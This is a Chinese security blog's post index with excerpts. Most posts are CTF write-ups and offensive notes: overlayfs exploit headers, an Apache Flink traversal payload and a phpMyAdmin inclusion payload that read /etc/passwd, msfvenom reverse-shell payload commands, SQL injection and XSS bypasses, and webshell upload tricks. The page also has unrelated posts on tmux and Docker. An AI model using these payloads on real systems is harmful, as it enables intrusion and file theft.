- 博客(104)
- 收藏
- 关注
原创 39166.c
/*just another overlayfs exploit, works on kernels before 2015-12-26# Exploit Title: overlayfs local root# Date: 2016-01-05# Exploit Author: rebel# Version: Ubuntu 14.04 LTS, 15.10 and more# Tested on: Ubuntu 14.04 LTS, 15.10# CVE : CVE-2015-8660.
2021-12-06 21:46:01 788
原创 POC_R
import requestsimport reimport sysimport urllib3from argparse import ArgumentParserimport threadpoolfrom urllib import parsefrom time import timeimport randomimport base64urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)filen.
2021-12-03 09:46:59 1151
原创 POC_ldop+++
# coding:utf-8 import requestsfrom lib.core.common import url_handle,get_random_uafrom lib.core.poc import POCBase# ...import urllib3urllib3.disable_warnings()class POC(POCBase): _info = { "author" : "hansi", # .
2021-11-25 10:12:54 1465
原创 POC+++++++
POC如下# coding:utf-8 import requestsfrom lib.core.common import url_handle,get_random_uafrom lib.core.poc import POCBase# ...import urllib3urllib3.disable_warnings()class POC(POCBase): _info = { "author" : "jijue", .
2021-11-24 20:17:43 1237
原创 POC+++++
# coding:utf-8 import requestsfrom lib.core.common import url_handle,get_random_uafrom lib.core.poc import POCBase# ...import urllib3urllib3.disable_warnings()class POC(POCBase): _info = { "author" : "jijue", #...
2021-08-27 18:36:00 644
原创 PHP反序列化漏洞
参考:https://cnblogs.com/xiaoqiyue/p/10951836.htmlhttps://www.jb51.net/article/188446.htm什么是序列化和反序列化?序列化是将变量转换为可保存或传输的字符串的过程;反序列化就是在适当的时候把这个字符串再转化成原来的变量使用。为什么要序列化?更好的将数组或者是对象存储到文件或数据库中注意: php序列化的...
2021-05-08 16:12:00 165
原创 常见网络安全设备弱口令
https://mp.weixin.qq.com/s?__biz=MzU3MDk3MTU2MQ==&mid=2247483790&idx=1&sn=b21061ab1fc530418f6d00796b789de2&chksm=fce60548cb918c5e603c438726087759d11f45b3e97c5914c2f657a3d9fc3fb5ce2d90...
2021-03-09 11:38:00 582
原创 python 开启http服务
Python <=2.3python-c"import SimpleHTTPServer as s; s.test();"8000Python >=2.4python-mSimpleHTTPServer8000Python3.xpython-mhttp.server8000
2021-03-05 10:46:00 171
原创 python快速查看内置模块函数
Python设计语言如何查看自带的模块的方法和属性?其中,它有内置函数dir(),需要查看什么模块,首先导入该模块,然后调用函数dir()。1.通用的帮助函数help() 使用help()函数来查看函数的帮助信息。 如:1 import requests2 3 help(requests) 会有类似如下输出:2.查询函数信息 ★查看模块下的所有函数:dir...
2021-02-23 20:19:00 944
原创 为什么我建议你卸载"抖音"?
无意中读到的一片文章-----最近读到一篇极好的文章《为什么我建议你卸载“抖音”?》,来自于微信公众号“经管世界”2018-05-14期,读完发人省醒。 抖音这个软件有毒 。当一个人在潜意识里控制不了自己的时候是最可怕的,尼尔·波兹曼在《娱乐至死》中说到:“人类无声无息地成为娱乐的附庸,毫无怨言,甚至心甘情愿,其结果是我们成了一个娱乐至死的物种。”其实不止抖音,现在很多事,看...
2021-02-18 17:33:00 1485 1
原创 Apache Flink目录遍历漏洞
fofa语法搜索app="Apache-Flink"poc:http://IP:PORT/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd读取成功
2021-01-07 19:40:00 340
原创 Centos7安装docker和docker-compose
1.安装docker# 使用yum安装dockeryum -y install docker# 启动systemctl start docker.service# 设置为开机自启动systemctl enable docker.service2.安装docker-compose# 下载docker-composesudo curl -L "https://github...
2020-12-31 08:47:00 172
原创 php fopen函数
php中没有单独的文件创建函数,如果我们想创建函数,可以使用fopen(),fopen()函数字面意思是打开文件,但该函数也有创建文件的功能,当使用 fopen() 函数打开一个文件时,如果文件不存在,则会尝试创建该文件,并返回一个资源。php fopen函数介绍fopen函数打开文件或者 URL语法:resource fopen( string filename, string...
2020-12-25 20:22:00 435
原创 linux动态查看mysql日志
第一步:使用下面的命令打开mysql的配置文件,去除68,69行的注释,然后保存。sudo vi /etc/mysql/mysql.conf.d/mysqld.cnf第二步:重启mysql服务,就会产生mysql日志文件。sudo service mysql restart额外:MySQL的日志文件所在的位置/var/log/mysql/mysql.log # ...
2020-12-25 09:05:00 1027
原创 msfvenom常用payload
payload命令windows:msfvenom-a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -opayload.exemac:msfvenom-...
2020-12-24 21:31:00 452
原创 msf常用payload
msf作为一款强大的漏洞检测工具,如何生成适用于msf的payload以及如何利用是使用msf的关键,今天就主要记录一下常用的payload以及如何使用。生成payload使用的工具是MSFVenom,下面看看他的帮助信息。在kali下可以使用如下命令列出MSFVenom可以生成的payload列表:msfvenom -l生成二进制文件关于二进制文件,主要介绍适用于Window...
2020-12-24 20:16:00 3978 1
原创 linux tmux基本操作
无意中发现了这个工具,感觉蛮好用的,哈哈基本操作新建会话:tmux new -s session-name查看会话:tmux ls进入会话:tmux a -t session-name断开会话:tmux detach关闭会话:tmux kill-session -t session-name快捷键输入命令tmux使用工具 上下分屏:ctrl + b 再按 " 左右分...
2020-12-24 14:50:00 151
原创 BUUCTF-[GWCTF 2019]我有一个数据库 1
phpMyadmin(CVE-2018-12613)后台任意文件包含漏洞影响版本:4.8.0——4.8.1payload:/phpmyadmin/?target=db_datadict.php%253f/../../../../../../../../etc/passwd本题payload:/phpmyadmin/?target=db_datadict.php%253f/../../.....
2020-12-23 18:40:00 293
原创 BUUCTF-[ACTF2020 新生赛]Include 1
本题主要考查了利用php://filter伪协议进行文件包含进入题目根据Tip进入正题,可以看到URL中存在文件包含(题目名也很直接)首先考虑"php://input"伪协议 + POST发送PHP代码的经典套路重新考虑之后使用"php://filter"伪协议"来进行包含。当它与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码...
2020-12-23 17:02:00 310 1
原创 BUUCTF-[极客大挑战 2019]BabySQL 1
题目考察了字符绕过,注释符绕过,sql双写绕过http://7738142d-0bba-4e03-b3a6-ff994b997fe2.node3.buuoj.cn/check.php?username=admin%27 order by 3%23&password=admin .可以看到or和by关键字被过滤尝试双写绕过http://7738142d-0bba-4e...
2020-12-19 19:54:00 268 1
原创 BUUCTF-[SUCTF 2019]EasySQL 1
好吧这题是我不配 看了网上大佬的WPpayload1:*,1 大佬的解法,好像直接将源码猜出来了 select $_GET['query'] || flag from flagpayload2:select1;setsql_mode=pipes_as_concat;select1||flagfromFlagpayload3:1;set sql_mode=PIPES_AS_...
2020-12-19 16:48:00 242 1
原创 BUUCTF-[极客大挑战 2019]LoveSQL 1
万能密码登入尝试解密MD5,解密失败尝试其他注入思路http://c95aaa7f-1256-4f57-b564-0ddf58b3bb67.node3.buuoj.cn/check.php?username=admin' order by 3%23&password=123 有回显http://c95aaa7f-1256-4f57-b564-0ddf58b3bb67.n...
2020-12-19 15:42:00 172 1
原创 BUUCTF-[极客大挑战 2019]HardSQL 1
使用updatexml报错法注入http://1bfb9fee-1fce-4f07-81b1-c8048e473a66.node3.buuoj.cn/check.php?username=admin'or(updatexml(1,concat(0x7e,version(),0x7e),1))%23&password=21http://1bfb9fee-1fce-4f07-81...
2020-12-19 14:29:00 186 1
原创 CTFHUB-Injection V2.0
拿到题目登录框这里了解一下登录框的两种查询模式一种是直接对用户输入的账号名和密码进行查询$username=$_POST['username'];$password=$_POST['password'];$sql='select * from user where username='$username' and password='$password'';#查询#登陆...
2020-12-18 19:40:00 430 2
原创 SQL注入中登录框只验证用户名情况下的绕过
思路:通过向数据库添加可控数据方法一:使用union select 1,2,3union select 语句会向数据库添加一条虚拟数据方法二:使用group by 字段 with rollup引用:group by将结果集中的数据行根据选择列的值进行逻辑分组group by 后可以跟with rollup,表示在进行分组统计的基础上再次进行汇总统计参考:https://w...
2020-12-18 19:12:00 339 1
原创 文件上传绕过姿势基础篇
文件上传绕过按照上传位置分为客户端和服务端按照上传类型分为黑名单和白名单黑名单绕过包括1、上传特殊可解析后缀 2、上传.htaccess (内容: SetHandler application/x-httpd-php 将之后上传的文件全部解析为php文件) 3、后缀大小写绕过 (PHP,ASP.等) ...
2020-12-17 15:35:00 208
原创 php伪协议实现命令执行的七种姿势(转)
首先归纳下常见的文件包含函数:include、require、include_once、require_once、highlight_file 、show_source 、readfile 、file_get_contents 、fopen 、file,计划对文件包含漏洞与php封装协议的利用方法进行总结,本篇先总结下一些封装协议,涉及的相关协议:file://、php://filter...
2020-12-17 09:57:00 172
原创 php文件包含+伪协议+文件上传漏洞利用实例(转)
1.上传文件过滤了后缀名和MIME类型,$_FILES['pic']['type']是由浏览器传输的文件类型决定,但是mime_content_type()是由php内置方法判断文件类型; 支持文件类型为application/zip,支持上传zip压缩文件,后缀名还是要改成.jpg或.gif,上传后将该名为随机数字(1499394959).jpg格式 $name...
2020-12-17 08:46:00 254
原创 CTFHUB-文件包含
思路:利用文件包含执行shell.txt文件,以拿到shellhttp://challenge-4b90ab5ce47f595f.sandbox.ctfhub.com:10080/?file=shell.txt点开shell文件拿到flagctfhub{869c02e49095087b467fdba8}...
2020-12-16 09:32:00 249
原创 CTFHUB-文件上传之00截断
上传bp抓包php 5.2版本的00截断,应该在上传路径截断访问 http://challenge-c93b95717911341d.sandbox.ctfhub.com:10080/upload/5.php蚁键连接
2020-12-15 11:18:00 1026
原创 图片马制作
方法一准备一张图片1.jpg,准备一句话php木马1.php通过控制台cmd命令制造图片马进入两个文件的文件夹打开控制台输入命令:命令解释:使用CMD制作一句话木马。参数/b指定以二进制格式复制、合并文件; 用于图像类/声音类文件参数/a指定以ASCII格式复制、合并文件。用于txt等文档类文件copy 1.jpg/b+1.php 2.j...
2020-12-15 09:53:00 311
原创 CTFHUB-文件上传之MIME绕过
1.MIME-Type介绍MIME(multipurpose Internet mail extensions)多用途互联网邮件扩展类型。是设定某种扩展名的文件用一种应用程序来打开的方式类型,当该扩展名文件被访问的时候,浏览器会自动使用指定应用程序来打开。多用于指定一些客户端自定义的文件名,以及一些媒体文件打开方式。2.burp绕过MIME-Type验证在上传时使用burp截断ht...
2020-12-15 09:42:00 1389
原创 CTFHUB-文件上传之.htaccess文件利用
网上找了一下什么是.htaccess文件首先我们先上传一个.htaccess文件,文件内容如下SetHandler application/x-httpd-php这段内容的作用是使所有的文件都会被解析为php文件这里上传一个jpg文件,内容为一句话木马蚁键连接,获得webshell...
2020-12-15 09:28:00 494
原创 Pass-02
和第一关一样,唯一就是注意有闭合和注释符id=1' and 1=1--+id=1' order by 3--+爆列id=1' and 1=2 union select 1,2,3--+ 2,3位置回显id=1' and 1=2 union select 1,2,group_concat(schema_name) from information_schema.sch...
2020-12-14 21:08:00 126
原创 URL连接符
+ URL 中+号表示空格%2B空格 URL中的空格可以用+号或者编码 %20/ 分隔目录和子目录 %2F? 分隔实际的URL和参数 %3F% 指定特殊字符 ...
2020-12-07 09:29:51 647
原创 XSS Cheat Sheet
XSS Cheat Sheet本文只发在Mannix基佬群和先知社区,非原创,实为整理所得,如果不喜欢,请点击左上角叉号关闭本页。XSS 101<h1>Hello,<script>alert(1)</script>!</h1>1. With <script> tag<script>alert(1)</script>2. With regular HTML tags2.1 Event-based<TAG
2020-12-02 19:27:40 6737
原创 文件上传绕过姿势补充
绕过姿势客户端绕过(抓包改包)• 服务端绕过 • 文件类型• 文件头 • 文件后缀名• 配合文件包含漏洞绕过• 配合服务器解析漏洞绕过• CMS、编辑器漏洞绕过• 配合操作系统文件命名规则绕过 这里只针对自己不太熟悉和使用的一些姿势进行解释。1. 通过服务器解析针对早期版本安全狗,可以多加一个filename或者将filename换位置,在IIS6.0下如果我们将filename放在如下位置2.配合文件包含漏洞前提:校验规则只校验当文件后缀名...
2020-12-02 15:10:33 216
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人